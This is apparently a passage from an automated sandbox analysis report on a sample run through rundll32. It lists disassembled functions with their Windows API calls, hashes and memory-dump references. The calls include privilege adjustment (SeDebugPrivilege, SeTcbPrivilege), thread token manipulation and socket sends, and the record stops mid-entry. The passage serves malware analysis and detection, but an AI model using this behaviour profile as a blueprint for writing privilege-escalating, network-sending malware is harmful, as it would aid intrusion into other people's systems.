                                              • GetProcessHeap.KERNEL32(00000008,?,75DAB010,00000000,00000000), ref: 04BF69E3
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BF69EC
                                              • memcpy.MSVCRT ref: 04BF6A19
                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 04BF6A3D
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BF6A40
                                              • memcpy.MSVCRT ref: 04BF6A6F
                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,?), ref: 04BF6A8F
                                              • HeapFree.KERNEL32(00000000), ref: 04BF6A92
                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 04BF6A99
                                              • HeapFree.KERNEL32(00000000), ref: 04BF6A9C
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$Process$AllocFreememcpy
                                              • String ID:
                                              • API String ID: 3405790324-0
                                              • Opcode ID: 34fb8cff60e9aaa6c88d8f49ac91f26efb5fdb57996bd56bb1bf06d9616bbd3e
                                              • Instruction ID: 15475b1205d466d7d8bba2fa35de3337dea217fe564cfc69308889cf5700f2af
                                              • Opcode Fuzzy Hash: 34fb8cff60e9aaa6c88d8f49ac91f26efb5fdb57996bd56bb1bf06d9616bbd3e
                                              • Instruction Fuzzy Hash: D531647590010AAFDB149FA8CC45E9E7BB9EF58344F058491EE08CB251E670F719CB90
                                              Function 04BF68B5 Relevance: 12.6, APIs: 10, Instructions: 96memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,?,75A373E0,00000000), ref: 04BF68EB
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BF68F4
                                              • memcpy.MSVCRT ref: 04BF6921
                                              • GetProcessHeap.KERNEL32(00000008,?,771AE010), ref: 04BF6946
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BF6949
                                              • memcpy.MSVCRT ref: 04BF6978
                                              • GetProcessHeap.KERNEL32(00000000,?,?), ref: 04BF6995
                                              • HeapFree.KERNEL32(00000000), ref: 04BF6998
                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 04BF699F
                                              • HeapFree.KERNEL32(00000000), ref: 04BF69A2
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$Process$AllocFreememcpy
                                              • String ID:
                                              • API String ID: 3405790324-0
                                              • Opcode ID: 30647581b21f7b9ffd1a9185e82eb39d4ae96244bc568c02ae26f023a16c9217
                                              • Instruction ID: 51ca5ff304164014c34039945badf4871eefb9c132f1abcdc2a0c18fb1a26d81
                                              • Opcode Fuzzy Hash: 30647581b21f7b9ffd1a9185e82eb39d4ae96244bc568c02ae26f023a16c9217
                                              • Instruction Fuzzy Hash: 4C31617590010AAFDB14EFA8CC45EAFBBB8EF58344F058455EA09CB251E770EA18CB90
                                              Function 04BF40E3 Relevance: 12.6, APIs: 10, Instructions: 91memorysleepCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,00000027,?,00000000,?,?,?,04BF423D,?,?,?,?,00000000,00000002), ref: 04BF40F8
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,04BF423D,?,?,?,?,00000000,00000002), ref: 04BF40FB
                                              • GetProcessHeap.KERNEL32(00000008,00000009,?,?,?,04BF423D,?,?,?,?,00000000,00000002), ref: 04BF4148
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,04BF423D,?,?,?,?,00000000,00000002), ref: 04BF414B
                                              • Sleep.KERNEL32(000007D0,00000000,?,?,00000000,00000000,?,?,?,?,04BF423D,?,?,?,?,00000000), ref: 04BF4184
                                              • Sleep.KERNEL32(000007D0,00000000,?,?,00000000,?,04BF423E,?,?,?,04BF423D,?,?,?,?,00000000), ref: 04BF41BC
                                              • GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,?,00000000,00000000,?,?,?,?,04BF423D,?,?,?,?), ref: 04BF41CB
                                              • HeapFree.KERNEL32(00000000,?,?,?,04BF423D,?,?,?,?,00000000,00000002), ref: 04BF41CE
                                              • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,04BF423D,?,?,?,?,00000000,00000002), ref: 04BF41D7
                                              • HeapFree.KERNEL32(00000000,?,?,?,04BF423D,?,?,?,?,00000000,00000002), ref: 04BF41DA
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$Process$AllocFreeSleep
                                              • String ID:
                                              • API String ID: 1437939644-0
                                              • Opcode ID: 11753fff5008642181fc6908328adb8f4f3869a16114ca3bcddc9b430b90021f
                                              • Instruction ID: 4f815b83b3f9cfe0e32b187b02501d60af43e88b0df90b87200cfa83e8182868
                                              • Opcode Fuzzy Hash: 11753fff5008642181fc6908328adb8f4f3869a16114ca3bcddc9b430b90021f
                                              • Instruction Fuzzy Hash: E3318FB4400315AADB209FA5CC08B6B7FF8EF59300F00854AFE8E97291D778E959DB60
                                              Function 04BF7897 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 48COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetTickCount.KERNEL32 ref: 04BF78AF
                                              • srand.MSVCRT ref: 04BF78B2
                                              • GetTickCount.KERNEL32 ref: 04BF78B9
                                                • Part of subcall function 04BF7CC5: GetCurrentProcess.KERNEL32(00000028,?,?,00000000,?,?,?,04BF79E8), ref: 04BF7CE9
                                                • Part of subcall function 04BF7CC5: OpenProcessToken.ADVAPI32(00000000,?,00000000,?,?,?,04BF79E8), ref: 04BF7CF0
                                                • Part of subcall function 04BF7CC5: LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 04BF7D02
                                                • Part of subcall function 04BF7CC5: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00000000), ref: 04BF7D25
                                                • Part of subcall function 04BF7CC5: GetLastError.KERNEL32(?,00000000), ref: 04BF7D2D
                                                • Part of subcall function 04BF7CC5: SetLastError.KERNEL32(?,?,00000000,?,?,?,04BF79E8), ref: 04BF7D3F
                                              • GetModuleFileNameW.KERNEL32(04C07BC8,0000030C,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,04BF79E8), ref: 04BF7926
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: CountErrorLastProcessTickToken$AdjustCurrentFileLookupModuleNameOpenPrivilegePrivilegesValuesrand
                                              • String ID: SeDebugPrivilege$SeShutdownPrivilege$SeTcbPrivilege
                                              • API String ID: 1536163209-50072501
                                              • Opcode ID: 89b33c89be121251bbf00dacbdf0df73a2b5e6c7d8dd6bb0b2791e134156af00
                                              • Instruction ID: bd40b678b27c594854e5e94ed106abd3b97a0f28e2b1a83d3077bbd90c62e092
                                              • Opcode Fuzzy Hash: 89b33c89be121251bbf00dacbdf0df73a2b5e6c7d8dd6bb0b2791e134156af00
                                              • Instruction Fuzzy Hash: 62017174D01220ABE714BBB6AC09B4A7E5EEB00794B4540E5EA0993180DF78FD04DFA0
                                              Function 04BF4F43 Relevance: 12.1, APIs: 7, Strings: 1, Instructions: 82memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,00000068,771AF380,?,77735E70,?,04BF51F9,?,?,?), ref: 04BF4F56
                                              • HeapAlloc.KERNEL32(00000000,?,04BF51F9,?,?,?), ref: 04BF4F5D
                                              • rand.MSVCRT ref: 04BF4F86
                                              • GetProcessHeap.KERNEL32(00000008,?,04BF51F9,?,00000000,?,04BF51F9,04BF51F9,?,00000000,00000000,000000FF,00000008,00000000,00000068), ref: 04BF4FF7
                                              • HeapFree.KERNEL32(00000000), ref: 04BF4FFE
                                              • GetProcessHeap.KERNEL32(00000008,00000000,04BF51F9,?,00000000,00000000,000000FF,00000008,00000000,00000068,?,04BF51F9,?,?,?), ref: 04BF5007
                                              • HeapFree.KERNEL32(00000000,?,04BF51F9,?,?,?), ref: 04BF500E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$Process$Free$Allocrand
                                              • String ID: p
                                              • API String ID: 2875874559-2181537457
                                              • Opcode ID: 6e40b4a478b869dc380e1d2cb6f2817b8b5ca13552f6997cbfe27ae6f5a7e177
                                              • Instruction ID: 92732880ab47e0123ee721e20abbd3be0bb6c5e0003fd59a28945e4d20c1a840
                                              • Opcode Fuzzy Hash: 6e40b4a478b869dc380e1d2cb6f2817b8b5ca13552f6997cbfe27ae6f5a7e177
                                              • Instruction Fuzzy Hash: 1A21E235500244BBEF219FE4CC88FAF7F79EF55311F008086FA099B181C6759859DBA1
                                              Function 04BF8832 Relevance: 12.1, APIs: 8, Instructions: 62memoryfileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateFileW.KERNEL32(04C07BC8,80000000,00000001,00000000,00000003,00000000,00000000), ref: 04BF884F
                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 04BF8860
                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 04BF886F
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BF8876
                                              • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 04BF888F
                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 04BF88A0
                                              • HeapFree.KERNEL32(00000000), ref: 04BF88A7
                                              • CloseHandle.KERNEL32(?), ref: 04BF88C6
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$File$Process$AllocCloseCreateFreeHandleReadSize
                                              • String ID:
                                              • API String ID: 3250796435-0
                                              • Opcode ID: a90db505c7ff53893c4e33a8ea14444687a36c7d85ac87e638091028b11d7c2d
                                              • Instruction ID: d8769bba87939c748056276d2d249524355589308150c468af8e481995f4481f
                                              • Opcode Fuzzy Hash: a90db505c7ff53893c4e33a8ea14444687a36c7d85ac87e638091028b11d7c2d
                                              • Instruction Fuzzy Hash: BC114F70900104BBEB206FA5EC8CEAFBFBCEB85751F10415AF51AA3180D3789D45DA60
                                              Function 04BF33A4 Relevance: 10.6, APIs: 7, Instructions: 66memorynetworkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,?,00000000,?,?,?,04BF3745,?,?,?,00000000,00000000,?,?,?,04BF4A6E), ref: 04BF33BB
                                              • HeapAlloc.KERNEL32(00000000,?,04BF3745,?,?,?,00000000,00000000,?,?,?,04BF4A6E,?,?,?,?), ref: 04BF33C2
                                              • htons.WS2_32(?), ref: 04BF33E1
                                              • memcpy.MSVCRT ref: 04BF3410
                                              • send.WS2_32(?,00000000,?,00000000), ref: 04BF3421
                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 04BF3434
                                              • HeapFree.KERNEL32(00000000), ref: 04BF343B
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$Process$AllocFreehtonsmemcpysend
                                              • String ID:
                                              • API String ID: 4260819906-0
                                              • Opcode ID: 7af4a71885538010400e40ee1eb9fd32626979fbfa9af6033ca3852035df8cd0
                                              • Instruction ID: 10fca1514a38e8c8be5458f1580aa7cc62ff52dcbf64e65104e652f99590c63d
                                              • Opcode Fuzzy Hash: 7af4a71885538010400e40ee1eb9fd32626979fbfa9af6033ca3852035df8cd0
                                              • Instruction Fuzzy Hash: 7C118E76400249ABEF019FA8DC89BAF7BACEF09314F044086FE059B241D779D909DB70
                                              Function 04BF3209 Relevance: 10.6, APIs: 7, Instructions: 65memorynetworkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,?,00000000,?,?,?,04BF3BAA,?,?,?,00000000,00000000,?,?,?,04BF4A6E), ref: 04BF3220
                                              • HeapAlloc.KERNEL32(00000000,?,04BF3BAA,?,?,?,00000000,00000000,?,?,?,04BF4A6E,?,?,?,?), ref: 04BF3227
                                              • htons.WS2_32(?), ref: 04BF3246
                                              • memcpy.MSVCRT ref: 04BF3276
                                              • send.WS2_32(?,00000000,?,00000000), ref: 04BF3287
                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 04BF329A
                                              • HeapFree.KERNEL32(00000000), ref: 04BF32A1
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$Process$AllocFreehtonsmemcpysend
                                              • String ID:
                                              • API String ID: 4260819906-0
                                              • Opcode ID: af9c841b9dce6fa40d2751aa705da50770be4ba3b4f921fc526487b1b3086e16
                                              • Instruction ID: faaeff4fd3e7dcefe8b2eaaebf19e5b3c1921f962e87e6c231958c8bf4c1db92
                                              • Opcode Fuzzy Hash: af9c841b9dce6fa40d2751aa705da50770be4ba3b4f921fc526487b1b3086e16
                                              • Instruction Fuzzy Hash: C6112C76500249AAEF009FE8DC49BAF7BA8EB49315F044046FE059B281D779D905D774
                                              Function 04BF6BD1 Relevance: 10.1, APIs: 8, Instructions: 61memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,?,771AF380,77735E70,?,?,04BF6CBD,?,?,00000000,?,04BF7A55,00000024,04BF6AA8,00000000,0000FFFF), ref: 04BF6C29
                                              • HeapFree.KERNEL32(00000000,?,?,04BF6CBD,?,?,00000000,?,04BF7A55,00000024,04BF6AA8,00000000,0000FFFF), ref: 04BF6C2C
                                              • GetProcessHeap.KERNEL32(00000000,?,771AF380,77735E70,?,?,04BF6CBD,?,?,00000000,?,04BF7A55,00000024,04BF6AA8,00000000,0000FFFF), ref: 04BF6C39
                                              • HeapFree.KERNEL32(00000000,?,?,04BF6CBD,?,?,00000000,?,04BF7A55,00000024,04BF6AA8,00000000,0000FFFF), ref: 04BF6C3C
                                              • GetProcessHeap.KERNEL32(00000000,?,771AF380,77735E70,?,?,04BF6CBD,?,?,00000000,?,04BF7A55,00000024,04BF6AA8,00000000,0000FFFF), ref: 04BF6C4E
                                              • HeapFree.KERNEL32(00000000,?,?,04BF6CBD,?,?,00000000,?,04BF7A55,00000024,04BF6AA8,00000000,0000FFFF), ref: 04BF6C51
                                              • GetProcessHeap.KERNEL32(00000000,00000000,771AF380,77735E70,?,?,04BF6CBD,?,?,00000000,?,04BF7A55,00000024,04BF6AA8,00000000,0000FFFF), ref: 04BF6C56
                                              • HeapFree.KERNEL32(00000000,?,?,04BF6CBD,?,?,00000000,?,04BF7A55,00000024,04BF6AA8,00000000,0000FFFF), ref: 04BF6C59
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$FreeProcess
                                              • String ID:
                                              • API String ID: 3859560861-0
                                              • Opcode ID: 50667b56249ce357bdd4fedca84a12f87ea01c260cd184ded7d54b4c3550abed
                                              • Instruction ID: 4606a42febab0d0a4467d7744dce5644460969bd20d6aa7e05b58819daa54fc0
                                              • Opcode Fuzzy Hash: 50667b56249ce357bdd4fedca84a12f87ea01c260cd184ded7d54b4c3550abed
                                              • Instruction Fuzzy Hash: C7114931600308EFDB20EF96CD84F2AB3B9EF85341F010499EA49976A1DB70FD49CA60
                                              Function 04BF652F Relevance: 9.1, APIs: 6, Instructions: 88COMMON
                                              Download Yara Rule
                                              APIs
                                              • CommandLineToArgvW.SHELL32(?,?,00000000,?,?,?,?,04BF7A8E,?), ref: 04BF6566
                                              • StrToIntW.SHLWAPI(00000000,?,?,?,?,04BF7A8E,?), ref: 04BF6581
                                              • StrStrW.SHLWAPI(00000000,04C01580,?,?,?,?,?,04BF7A8E,?), ref: 04BF65B3
                                              • StrStrW.SHLWAPI(00000000,04C01588,?,?,?,?,?,04BF7A8E,?), ref: 04BF65CD
                                              • StrChrW.SHLWAPI(00000000,0000003A,?,?,?,?,?,04BF7A8E,?), ref: 04BF65DF
                                              • LocalFree.KERNEL32(00000000,?,?,?,?,04BF7A8E,?), ref: 04BF6607
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: ArgvCommandFreeLineLocal
                                              • String ID:
                                              • API String ID: 1203019955-0
                                              • Opcode ID: b0f28eafb8b963e19d10580aea5254bdcb00160d914c48e0868002f923d514ba
                                              • Instruction ID: aa2c9a961da336a7a438d2807b1538d82c4b777b02cd2efe316e9c1f9c10774c
                                              • Opcode Fuzzy Hash: b0f28eafb8b963e19d10580aea5254bdcb00160d914c48e0868002f923d514ba
                                              • Instruction Fuzzy Hash: 7B31D531901118FFDF219F68CD44AADBB68FF14745B0480A6FD0AE7240E774FA4A9B90
                                              Function 04BF98AB Relevance: 9.1, APIs: 6, Instructions: 76threadsynchronizationCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 04BF6CED: GetProcessHeap.KERNEL32(00000008,00000008,?,?,?,04BF6B24,00000000,00000000,?,?,?,04BFA35C,?), ref: 04BF6CFC
                                                • Part of subcall function 04BF6CED: HeapAlloc.KERNEL32(00000000,?,?,04BF6B24,00000000,00000000,?,?,?,04BFA35C,?), ref: 04BF6CFF
                                                • Part of subcall function 04BF6CED: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,04BF6B24,00000000,00000000,?,?,?,04BFA35C,?), ref: 04BF6D24
                                                • Part of subcall function 04BF6CED: HeapFree.KERNEL32(00000000,?,?,04BF6B24,00000000,00000000,?,?,?,04BFA35C,?), ref: 04BF6D27
                                              • CreateThread.KERNEL32(00000000,00000000,04BF988B,?,00000004,00000000), ref: 04BF98FD
                                              • SetThreadToken.ADVAPI32(?,?,?,04BFA15C,?,?), ref: 04BF990F
                                              • ResumeThread.KERNEL32(?,?,04BFA15C,?,?), ref: 04BF991C
                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,04BFA15C,?,?), ref: 04BF992C
                                              • GetLastError.KERNEL32(?,04BFA15C,?,?), ref: 04BF9934
                                              • CloseHandle.KERNEL32(?,?,04BFA15C,?,?), ref: 04BF993D
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$Thread$Process$AllocCloseCreateErrorFreeHandleLastObjectResumeSingleTokenWait
                                              • String ID:
                                              • API String ID: 298440786-0
                                              • Opcode ID: f95ab8df61a72f594e2c1dffb1435c0d9aac694ac7dcde9658f861126380220b
                                              • Instruction ID: b4d35dd1fef43d25676a32b0cd5b1015ba5cc3bee99cfd8dea8449bf463d6e21
                                              • Opcode Fuzzy Hash: f95ab8df61a72f594e2c1dffb1435c0d9aac694ac7dcde9658f861126380220b
                                              • Instruction Fuzzy Hash: 722141B5A00109BFDF009FE4DC8499EB77CEF48314F1145A6EB1AE3150D734AE199B60
                                              Function 04BF6735 Relevance: 9.1, APIs: 6, Instructions: 68COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 04BF6477: GetTickCount.KERNEL32 ref: 04BF6477
                                              • wsprintfW.USER32 ref: 04BF6758
                                              • EnterCriticalSection.KERNEL32(04C07B9C,?,00000000,00000000), ref: 04BF6783
                                              • StrCatW.SHLWAPI(?,?), ref: 04BF67D1
                                              • StrCatW.SHLWAPI(?,04C03B90), ref: 04BF67D7
                                              • SetLastError.KERNEL32(0000007A), ref: 04BF67DF
                                              • LeaveCriticalSection.KERNEL32(04C07B9C), ref: 04BF67EA
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: CriticalSection$CountEnterErrorLastLeaveTickwsprintf
                                              • String ID:
                                              • API String ID: 230659905-0
                                              • Opcode ID: 0bde28aa62ad7e0ea5733dee1abffb05585599bd5701f3b21509661e63418598
                                              • Instruction ID: f400ad3ac211b1abccea411cc0a49e42d10687cc208539d0c06eaf1dd5d9dde4
                                              • Opcode Fuzzy Hash: 0bde28aa62ad7e0ea5733dee1abffb05585599bd5701f3b21509661e63418598
                                              • Instruction Fuzzy Hash: 6E11E9316001049BDB106BA8DC49B9A7769EF44344F0489A1FE4EDB190EA74FE49CFD1
                                              Function 04BFA3B1 Relevance: 9.0, APIs: 6, Instructions: 44threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateThread.KERNEL32(00000000,00000000,04BFA016,00000000,00000004,00000000), ref: 04BFA3C9
                                              • SetThreadToken.ADVAPI32(?,?,?,?,04BF7B43,?,?,00000004,04BF787C,00000000,000000FF), ref: 04BFA3DD
                                              • ResumeThread.KERNEL32(?,?,?,04BF7B43,?,?,00000004,04BF787C,00000000,000000FF), ref: 04BFA3EA
                                              • GetLastError.KERNEL32(?,?,04BF7B43,?,?,00000004,04BF787C,00000000,000000FF), ref: 04BFA3F7
                                              • CloseHandle.KERNEL32(?,?,?,04BF7B43,?,?,00000004,04BF787C,00000000,000000FF), ref: 04BFA402
                                              • SetLastError.KERNEL32(00000057,?,?,04BF7B43,?,?,00000004,04BF787C,00000000,000000FF), ref: 04BFA411
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Thread$ErrorLast$CloseCreateHandleResumeToken
                                              • String ID:
                                              • API String ID: 2435877492-0
                                              • Opcode ID: 2458d703f53fd22195ef30dc9ee5d03c81860986c8963199d96c1f27bd2a00d6
                                              • Instruction ID: bbc6b6a4b9534f9230b03577370134523d10889937ebf747a72964a97c4cf23b
